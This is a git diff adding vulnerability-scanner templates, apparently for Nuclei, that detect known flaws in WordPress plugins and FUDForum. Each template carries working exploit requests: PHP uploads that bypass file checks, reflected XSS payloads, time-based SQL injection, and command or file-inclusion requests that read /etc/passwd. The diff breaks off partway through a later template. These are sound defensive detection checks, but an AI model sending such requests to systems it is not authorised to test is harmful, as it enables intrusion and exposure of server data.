+1,64 @@ +id: CVE-2021-24145 + +info: + name: Modern Events Calendar Lite < 5.16.5 - Arbitrary File Upload to RCE + author: theamanrawat + severity: high + description: | + Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request. + remediation: Fixed in version 5.16.5 + reference: + - https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610 + - https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip + - https://github.com/dnr6419/CVE-2021-24145 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24145 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2021-24145 + cwe-id: CWE-434 + metadata: + verified: "true" + tags: cve,cve2021,rce,wordpress,wp-plugin,wp,modern-events-calendar-lite,auth + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875 + + -----------------------------132370916641787807752589698875 + Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php" + Content-Type: text/csv + + <?php echo 'CVE-2021-24145'; ?> + + -----------------------------132370916641787807752589698875 + Content-Disposition: form-data; name="mec-ix-action" + + import-start-bookings + -----------------------------132370916641787807752589698875-- + + - | + GET /wp-content/uploads/{{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(all_headers_3, "text/html") + - status_code_3 == 200 + - contains(body_3, 'CVE-2021-24145') + condition: and diff --git a/cves/2021/CVE-2021-24155.yaml b/cves/2021/CVE-2021-24155.yaml new file mode 100644 index 0000000000..2af733a77d --- /dev/null +++ b/cves/2021/CVE-2021-24155.yaml @@ -0,0 +1,77 @@ +id: CVE-2021-24155 + +info: + name: Backup Guard < 1.6.0 - Authenticated Arbitrary File Upload + author: theamanrawat + severity: high + description: | + The WordPress Backup and Migrate Plugin – Backup Guard WordPress plugin before 1.6.0 did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE. + remediation: Fixed in version 1.6.0 + reference: + - https://wpscan.com/vulnerability/d442acac-4394-45e4-b6bb-adf4a40960fb + - https://wordpress.org/plugins/backup/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24155 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2021-24155 + cwe-id: CWE-434 + metadata: + verified: "true" + tags: cve,cve2021,rce,wordpress,wp-plugin,wp,backup,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/javascript, */*; q=0.01 + Content-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921 + + -----------------------------204200867127808062083805313921 + Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php" + Content-Type: application/x-php + + <?php + + echo "CVE-2021-24155"; + + ?> + + -----------------------------204200867127808062083805313921-- + + - | + GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1 + Host: {{Hostname}} + + + req-condition: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(all_headers_4, "text/html") + - status_code_4 == 200 + - contains(body_3, '{\"success\":1}') + - contains(body_4, 'CVE-2021-24155') + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'BG_BACKUP_STRINGS = {"nonce":"([0-9a-zA-Z]+)"};' + internal: true diff --git a/cves/2021/CVE-2021-24169.yaml b/cves/2021/CVE-2021-24169.yaml new file mode 100644 index 0000000000..8cdebaf191 --- /dev/null +++ b/cves/2021/CVE-2021-24169.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-24169 + +info: + name: Advanced Order Export For WooCommerce < 3.1.8 - Authenticated Reflected Cross-Site Scripting (XSS) + author: r3Y3r53 + severity: medium + description: | + This Advanced Order Export For WooCommerce WordPress plugin before 3.1.8 helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to reflected XSS. + remediation: Fixed in version 3.1.8 + reference: + - https://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3 + - https://www.exploit-db.com/exploits/50324 + - https://wordpress.org/plugins/woo-order-export-lite/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24169 + metadata: + verified: "true" + tags: cve,cve2021,xss,wordpress,wp-plugin,wp,woo-order-export-lite,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "<script>alert(document.domain)</script>")' + - 'contains(body_2, "woo-order-export-lite")' + condition: and diff --git a/cves/2021/CVE-2021-24287.yaml b/cves/2021/CVE-2021-24287.yaml new file mode 100644 index 0000000000..e374a9edcb --- /dev/null +++ b/cves/2021/CVE-2021-24287.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-24287 + +info: + name: Select All Categories and Taxonomies < 1.3.2 - Reflected Cross-Site Scripting (XSS) + author: r3Y3r53 + severity: medium + description: | + The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue + remediation: Fixed in version 1.3.2 + reference: + - https://www.exploit-db.com/exploits/50349 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24287 + - https://wpscan.com/vulnerability/56e1bb56-bfc5-40dd-b2d0-edef43d89bdf + - https://wordpress.org/plugins/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons/ + metadata: + verified: "true" + tags: cve,cve2021,xss,wordpress,wp-plugin,wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(document.domain); HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "alert(document.domain)")' + - 'contains(body_2, "Set up the taxonomies")' + condition: and diff --git a/cves/2021/CVE-2021-24347.yaml b/cves/2021/CVE-2021-24347.yaml new file mode 100644 index 0000000000..2d8bdc2b99 --- /dev/null +++ b/cves/2021/CVE-2021-24347.yaml @@ -0,0 +1,98 @@ +id: CVE-2021-24347 + +info: + name: SP Project & Document Manager < 4.22 - Authenticated Shell Upload + author: theamanrawat + severity: high + description: | + The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing the file extension's case, for example, from "php" to "pHP". + remediation: Fixed in version 4.22 + reference: + - https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a + - https://wordpress.org/plugins/sp-client-document-manager/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24347 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.3 + cve-id: CVE-2021-24347 + cwe-id: CWE-434 + metadata: + verified: "true" + tags: cve,cve2021,rce,wordpress,wp-plugin,wp,sp-client-document-manager,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1 + Host: {{Hostname}} + + - | + POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy + + ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy + Content-Disposition: form-data; name="cdm_upload_file_field" + + {{nonce}} + ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy + Content-Disposition: form-data; name="_wp_http_referer" + + /wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 + ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy + Content-Disposition: form-data; name="dlg-upload-name" + + + ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy + Content-Disposition: form-data; name="dlg-upload-file[]"; filename="" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy + Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP" + Content-Type: image/svg+xml + + <?php + + echo "CVE-2021-24347"; + + ?> + ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy + Content-Disposition: form-data; name="dlg-upload-notes" + + + ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy + Content-Disposition: form-data; name="sp-cdm-community-upload" + + Upload + ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy-- + + + - | + GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(all_headers_4, "text/html") + - status_code_4 == 200 + - contains(body_4, "CVE-2021-24347") + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'name="cdm_upload_file_field" value="([0-9a-zA-Z]+)"' + internal: true diff --git a/cves/2021/CVE-2021-24554.yaml b/cves/2021/CVE-2021-24554.yaml new file mode 100644 index 0000000000..41b3e7d809 --- /dev/null +++ b/cves/2021/CVE-2021-24554.yaml @@ -0,0 +1,44 @@ +id: CVE-2021-24554 + +info: + name: Paytm - Donation Plugin <= 1.3.2 - Authenticated (admin+) SQL Injection + author: theamanrawat + severity: high + description: | + The Paytm Donation Plugin WordPress plugin through 1.3.2 does not sanitise, validate or escape the id GET parameter before using it in a SQL statement when deleting donations, leading to an authenticated SQL injection issue. + reference: + - https://wpscan.com/vulnerability/f2842ac8-76fa-4490-aa0c-5f2b07ecf2ad + - https://wordpress.org/plugins/wp-paytm-pay/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24554 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2021-24554 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + @timeout: 10s + GET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration_2>=6' + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "paytm-settings_page_wp_paytm_donation")' + condition: and diff --git a/cves/2021/CVE-2021-24875.yaml b/cves/2021/CVE-2021-24875.yaml new file mode 100644 index 0000000000..a05bace62e --- /dev/null +++ b/cves/2021/CVE-2021-24875.yaml @@ -0,0 +1,42 @@ +id: CVE-2021-24875 + +info: + name: eCommerce Product Catalog for WordPress < 3.0.39 - Reflected Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute, leading to a Reflected Cross-Site Scripting issue. + remediation: Fixed in version 3.0.39 + reference: + - https://wpscan.com/vulnerability/652efc4a-f931-4668-ae74-a58b288a5715 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24875 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24875 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2022,xss,wp,wordpress,wp-plugin,ecommerce-product-catalog,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "alert(document.domain)")' + - 'contains(body_2, "eCommerce Product Catalog")' + condition: and diff --git a/cves/2021/CVE-2021-24931.yaml b/cves/2021/CVE-2021-24931.yaml new file mode 100644 index 0000000000..7c1088f562 --- /dev/null +++ b/cves/2021/CVE-2021-24931.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-24931 + +info: + name: Secure Copy Content Protection and Content Locking < 2.8.2 - Unauthenticated SQL Injection + author: theamanrawat + severity: critical + description: | + The Secure Copy Content Protection and Content Locking WordPress plugin before 2.8.2 does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an SQL injection. + remediation: Fixed in version 2.8.2 + reference: + - https://wpscan.com/vulnerability/1cd52d61-af75-43ed-9b99-b46c471c4231 + - https://wordpress.org/plugins/secure-copy-content-protection/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24931 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24931 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,secure-copy-content-protection,unauth + +requests: + - raw: + - | + @timeout: 20s + GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "{\"status\":true")' + condition: and diff --git a/cves/2021/CVE-2021-25067.yaml b/cves/2021/CVE-2021-25067.yaml new file mode 100644 index 0000000000..8379219a1c --- /dev/null +++ b/cves/2021/CVE-2021-25067.yaml @@ -0,0 +1,44 @@ +id: CVE-2021-25067 + +info: + name: Landing Page Builder < 1.4.9.6 - Cross-Site Scripting + author: theamanrawat + severity: medium + description: | + The Landing Page Builder WordPress plugin before 1.4.9.6 was affected by a reflected XSS in page-builder-add on the ulpb_post admin page. + remediation: Fixed in version 1.4.9.6. + reference: + - https://wpscan.com/vulnerability/365007f0-61ac-4e81-8a3a-3a068f2c84bc + - https://wordpress.org/plugins/page-builder-add/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-25067 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2021-25067 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2021,xss,wordpress,wp-plugin,wp,page-builder-add,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "test\\\" style=animation-name:rotation onanimationstart=alert(document.domain)")' + - 'contains(body_2, "Enter Page Title")' + condition: and diff --git a/cves/2021/CVE-2021-27520.yaml b/cves/2021/CVE-2021-27520.yaml new file mode 100644 index 0000000000..016e509822 --- /dev/null +++ b/cves/2021/CVE-2021-27520.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-27520 + +info: + name: FUDForum 3.1.0 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "author" parameter. + reference: + - https://www.exploit-db.com/exploits/49943 + - https://nvd.nist.gov/vuln/detail/CVE-2021-27520 + metadata: + verified: "true" + shodan-query: html:"FUDforum" + tags: cve,cve2021,xss,fuddorum + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x"+onmouseover%3Dalert%28document.domain%29+x%3D' + - '{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x"+onmouseover%3Dalert%28document.domain%29+x%3D%22' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'onmouseover=alert(document.domain) x=' + - 'FUDforum' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/cves/2022/CVE-2022-0693.yaml b/cves/2022/CVE-2022-0693.yaml new file mode 100644 index 0000000000..f61c3eb9f7 --- /dev/null +++ b/cves/2022/CVE-2022-0693.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-0693 + +info: + name: Master Elements <= 8.0 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The Master Elements WordPress plugin through 8.0 does not validate and escape the meta_ids parameter of its remove_post_meta_condition AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL Injection. + reference: + - https://wpscan.com/vulnerability/a72bf075-fd4b-4aa5-b4a4-5f62a0620643 + - https://wordpress.org/plugins/master-elements + - https://nvd.nist.gov/vuln/detail/CVE-2022-0693 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0693 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,master-elements,unauth + +requests: + - raw: + - | + @timeout: 10s + GET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(body, "Post Meta Setting Deleted Successfully")' + condition: and diff --git a/cves/2022/CVE-2022-0760.yaml b/cves/2022/CVE-2022-0760.yaml new file mode 100644 index 0000000000..30d87c18e8 --- /dev/null +++ b/cves/2022/CVE-2022-0760.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-0760 + +info: + name: Simple Link Directory < 7.7.2 - Unauthenticated SQL injection + author: theamanrawat + severity: critical + description: | + The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcopd_upvote_action AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL Injection. + reference: + - https://wpscan.com/vulnerability/1c83ed73-ef02-45c0-a9ab-68a3468d2210 + - https://wordpress.org/plugins/simple-link-directory/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0760 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0760 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth + +requests: + - raw: + - | + @timeout 20s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz) + + matchers: + - type: dsl + dsl: + - 'duration>=7' + - 'status_code == 200 || status_code == 500' + - 'contains(content_type, "text/html")' + - 'contains(body, "vote_status") || contains(body, "critical error")' + condition: and diff --git a/cves/2022/CVE-2022-0949.yaml b/cves/2022/CVE-2022-0949.yaml new file mode 100644 index 0000000000..fd2a4a4d54 --- /dev/null +++ b/cves/2022/CVE-2022-0949.yaml @@ -0,0 +1,56 @@ +id: CVE-2022-0949 + +info: + name: WP Block and Stop Bad Bots < 6.930 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection WordPress plugin before 6.930 does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users, leading to a SQL injection. + remediation: Fixed in version 6.930 + reference: + - https://wpscan.com/vulnerability/a0fbb79a-e160-49df-9cf2-18ab64ea66cb + - https://wordpress.org/plugins/stopbadbots/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0949 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0949 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,stopbadbots,unauth + +variables: + IP: '{{rand_ip("1.1.1.0/24")}}' + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + X-Real-IP: {{IP}} + Content-Type: application/x-www-form-urlencoded + + action=stopbadbots_grava_fingerprint&fingerprint=0 + + - | + @timeout 10s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + X-Real-IP: {{IP}} + Content-Type: application/x-www-form-urlencoded + + action=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6)) + + - | + GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'duration_2>=6' + - 'status_code_2 == 200' + - 'contains(body_3, "commentform")' + condition: and diff --git a/cves/2022/CVE-2022-1013.yaml b/cves/2022/CVE-2022-1013.yaml new file mode 100644 index 0000000000..0889ee7328 --- /dev/null +++ b/cves/2022/CVE-2022-1013.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-1013 + +info: + name: Personal Dictionary < 1.3.4 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The Personal Dictionary WordPress plugin before 1.3.4 fails to properly sanitize user supplied POST data before it is being interpolated in an SQL statement and then executed, leading to a blind SQL injection vulnerability. + remediation: Fixed in version 1.3.4. + reference: + - https://wpscan.com/vulnerability/eed70659-9e3e-42a2-b427-56c52e0fbc0d + - https://wordpress.org/plugins/personal-dictionary/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1013 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-1013 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,personal-dictionary,unauth + +requests: + - raw: + - | + @timeout: 30s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(5)))CEHy)--+- + + matchers: + - type: dsl + dsl: + - 'duration>=5' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "\"status\":true,")' + condition: and diff --git a/cves/2022/CVE-2022-3934.yaml b/cves/2022/CVE-2022-3934.yaml new file mode 100644 index 0000000000..e2abea2dd3 --- /dev/null +++ b/cves/2022/CVE-2022-3934.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-3934 + +info: + name: Flat PM < 3.0.13 - Reflected Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The FlatPM WordPress plugin before 3.0.13 does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + remediation: Fixed in version 3.0.13. + reference: + - https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a + - https://nvd.nist.gov/vuln/detail/CVE-2022-3934 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-3934 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2022,xss,flatpm,wordpress,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + @timeout: 10s + GET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "alert(document.domain)") && contains(body_2, "Flat PM")' + condition: and diff --git a/cves/2022/CVE-2022-4060.yaml b/cves/2022/CVE-2022-4060.yaml new file mode 100644 index 0000000000..d873525362 --- /dev/null +++ b/cves/2022/CVE-2022-4060.yaml @@ -0,0 +1,46 @@ +id: CVE-2022-4060 + +info: + name: User Post Gallery <= 2.19 - Unauthenticated RCE + author: theamanrawat + severity: critical + description: | + The User Post Gallery WordPress plugin through 2.19 does not limit what callback functions can be called by users, making it possible to any visitors to run code on sites running it. + reference: + - https://wpscan.com/vulnerability/8f982ebd-6fc5-452d-8280-42e027d01b1e + - https://wordpress.org/plugins/wp-upg/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-4060 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-4060 + cwe-id: CWE-94 + metadata: + verified: "true" + tags: cve,cve2022,rce,wordpress,wp-plugin,wp,wp-upg,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/json" + + - type: word + part: body + words: + - "recordsFiltered" + + - type: status + status: + - 200 diff --git a/cves/2022/CVE-2022-4063.yaml b/cves/2022/CVE-2022-4063.yaml new file mode 100644 index 0000000000..22a8aed2aa --- /dev/null +++ b/cves/2022/CVE-2022-4063.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-4063 + +info: + name: InPost Gallery < 2.1.4.1 - Unauthenticated LFI to RCE + author: theamanrawat + severity: critical + description: | + The InPost Gallery WordPress plugin before 2.1.4.1 insecurely uses PHP's extract() function when rendering HTML views, allowing attackers to force the inclusion of malicious files & URLs, which may enable them to run code on servers. + remediation: Fixed in version 2.1.4.1 + reference: + - https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7 + - https://wordpress.org/plugins/inpost-gallery/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-4063 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-4063 + cwe-id: CWE-22 + metadata: + verified: "true" + tags: cve,cve2022,lfi,wordpress,wp-plugin,wp,inpost-gallery,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ==" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/cves/2022/CVE-2022-4301.yaml b/cves/2022/CVE-2022-4301.yaml new file mode 100644 index 0000000000..9493c9ceee --- /dev/null +++ b/cves/2022/CVE-2022-4301.yaml @@ -0,0 +1,43 @@ +id: CVE-2022-4301 + +info: + name: Sunshine Photo Cart < 2.9.15 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Sunshine Photo Cart WordPress plugin before 2.9.15 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. + remediation: Fixed in version 2.9.15 + reference: + - 